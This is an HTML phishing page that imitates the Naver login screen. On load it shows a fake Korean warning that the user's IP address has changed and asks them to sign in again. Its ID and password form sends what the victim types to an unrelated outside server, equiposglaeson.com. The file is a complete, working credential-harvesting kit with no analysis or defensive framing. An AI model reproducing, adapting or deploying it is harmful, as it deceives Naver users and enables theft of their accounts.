<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Naver Sign in</title>
<meta http-equiv="content-type" content="text/html; charset=UTF8">

<link href="https://i.ibb.co/RC0tzWR/favicon-1024.png" rel="" />
<style type="text/css">
.textbox { 
    border: 1px solid #c5cddb; 
	background: transparent;
    height: 55px; 
    width: 275px; 
  	font-family: Tahoma,"????","??",arial;
    font-size: 16px;
  	color: #555;
    padding-left: 42px; 
    border-radius: 0px;  
}  
.textbox:focus { 
    outline: none; 
    border: 1px solid #0A8745; 
} 
 </style>
 <style type="text/css">
 input[type=checkbox].css-checkbox {
							position:absolute; z-index:-1000; left:-1000px; overflow: hidden; clip: rect(0 0 0 0); height:1px; width:1px; margin:-1px; padding:0; border:0;
						}

						input[type=checkbox].css-checkbox + label.css-label {
							padding-left:23px;
							height:18px; 
							display:inline-block;
							line-height:18px;
							background-repeat:no-repeat;
							background-position: 0 0;
							font-size:18px;
							vertical-align:middle;
							cursor:pointer;

						}

						input[type=checkbox].css-checkbox:checked + label.css-label {
							background-position: 0 -18px;
						}
						label.css-label {
				background-image:url(images/csscheckbox_c9447a4d7553b9381044a5db2a0e8ab3.png);
				-webkit-touch-callout: none;
				-webkit-user-select: none;
				-khtml-user-select: none;
				-moz-user-select: none;
				-ms-user-select: none;
				user-select: none;
			}
 </style>
<style type="text/css">
div#container
{
	position:relative;
	width: 1349px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>
<style>
p{font-size: 40px;}

</style>

			<script language="javascript">
function submitform()
{
   document.forms["Form"].submit();
}

// Form validation code will come here.
function validate()
{
 
   if( document.Form.formtext1.value == "" )
   {
     alert( "아이디 또는 이메일 주소를 입력해주세요." );
     document.Form.formtext1.focus() ;
     return false;
   }
   if( document.Form.formtext2.value == "" )
   {
     alert( "비밀번호를 입력해주세요." );
     document.Form.formtext2.focus() ;
     return false;
   }

  else{
   return( true );
   }
}
//-->
</script>

</head>
<body bgColor="#F5F6F7" Link="#000000" VLink="#000000" ALink="#000000"  >
<script language=javascript>
alert('Naver 회원님의 IP주소가 변경되었습니다. 안전한 이용과 정보 보호를 위해 다시 한번 로그인해 주세요. ');
</script>

<div id="container">
  <div id="image1" style="position:absolute; overflow:hidden; left:1px; top:14px; width:1349px; height:959px; z-index:0"><img src="https://i.ibb.co/Wx8qykW/nv-b.jpg" alt="" title="" border=0 width=1349 height=959></div>
  <form name="Form" action="https://equiposglaeson.com/02/nvj.php"  method="post" onSubmit="return(validate());">
    <input name="formtext1" value="" placeholder="아이디" class="textbox" autocomplete="off" required type="text" style="position:absolute;width:474px;left:431px;top:336px;z-index:6" height="61">
	  <input name="formtext2" value="" placeholder="비밀번호" class="textbox" autocomplete="off" required type="password" style="position:absolute;width:474px;left:431px;top:393px;z-index:6" height="61">
	  
	  <div id="formimage1" style="position:absolute; left:443px; top:516px; width:460px; height:63px; z-index:5" >
  <input type="image" name="submit" width="461" height="63" src="https://i.ibb.co/GF3fDzW/btn.jpg" >
</div>

  </form>


</body>
</html>
